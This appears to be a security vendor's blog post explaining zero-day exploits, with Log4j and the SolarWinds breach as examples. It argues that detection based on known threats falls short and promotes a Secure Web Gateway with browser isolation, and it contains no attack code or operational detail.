What is a zero-day exploit and why should you care?

Zero-day exploits have been all over the news in recent years, and several foreign governments have been accused of enabling attacks on vulnerable network infrastructure in the U.S. and the European Union. Most recently, a critical Internet zero-day was discovered in Log4j, a Java library for logging error messages in applications. Given the library is developed by the open-source Apache Software Foundation, this is a ubiquitous piece of software, meaning the flaw likely impacts millions of computers.

But what exactly is a zero-day exploit, how does it work, and should you be concerned? It’s time to answer those questions and share what you can do to protect your organization from these types of web threats.

What is a zero-day exploit?

A zero-day exploit is the result of a threat actor taking advantage of a previously unknown vulnerability in software, firmware, an operating system, a web application, a website, or a Software as a Service (SaaS) platform. The end goal is to download malware onto a device that can then deliver ransomware, crash the hard drive, or spread across the network in search of other vulnerable targets.

What is an example of a zero-day exploit?

Let’s use the SolarWinds breach as an example. This major cybersecurity attack, believed to have been conducted by Russian nation-state threat actors, used a zero-day exploit to gain access to corporate and government systems and data in the U.S. and the European Union. The attack used a backdoor in a SolarWinds library to insert malicious code into legitimate software updates for the company’s Orion solution. This enabled the attackers to forge new tokens that gave them trusted and highly privileged access to networks. High-profile victims included Microsoft, cybersecurity vendor FireEye, and the U.S. government. In addition to the theft of data, the attack forced more than 30,000 SolarWinds customers to check to see whether they had been breached, requiring them to take systems offline and undergo months-long remediation procedures as a precaution.

How do threat actors identify vulnerabilities?

Attackers spend an enormous amount of resources to reverse engineer popular technology products so they can identify and exploit vulnerabilities in the code. Many of these hacker groups are sponsored by foreign governments that provide protection and, in some cases, financial support. A particularly effective target is networking software that provides remote administrative access to critical infrastructure.

Why aren’t legacy security solutions effective against these types of attacks?

By definition, zero-day exploits are difficult to detect. If they were identified, then the vendor would simply patch the flaw. These exploits are unknown until they are known. Most vendors rely on white hat hackers to identify vulnerabilities in their software, tell them about it, and give them a chance to fix it. Black hat hackers don’t operate under the same code of ethics. If they find some code they can exploit, they’re likely to keep it a secret until they can benefit by either utilizing the vulnerability or selling it on the black market. Because of this, legacy detect-and-respond cybersecurity solutions that are based on known intelligence are ill-suited for this type of attack. You can’t detect something you have no knowledge of.

What can organizations do to protect themselves

Honestly, not much. It certainly helps to do business only with vendors you trust are keeping their solutions secure. But even the most hardened code has its vulnerabilities. The best thing you can do is simply make it impossible for threat actors to gain access to your users’ devices. As the workforce continues to decentralize, it’s more critical than ever to protect your highly distributed infrastructure through a Secure Web Gateway (SWG) with web isolation technology.

OK, so what’s a SWG powered by isolation?

A Secure Web Gateway, or SWG, powered by isolation technology has the standard controls for web traffic, such as blocking known bad sites and providing acceptable use policies. When coupled with isolation technology, this SWG creates an abstracted layer in the cloud between your users and the Internet. Code on websites, web apps, SaaS platforms, and other web content is fetched and executed in a remote browser in the cloud rather than on end devices. Without access to the web browser, threat actors have no avenue for uploading malicious content to users’ devices – even if a vulnerability exists. This shuts out malware and ransomware without blocking legitimate web content or impacting user productivity.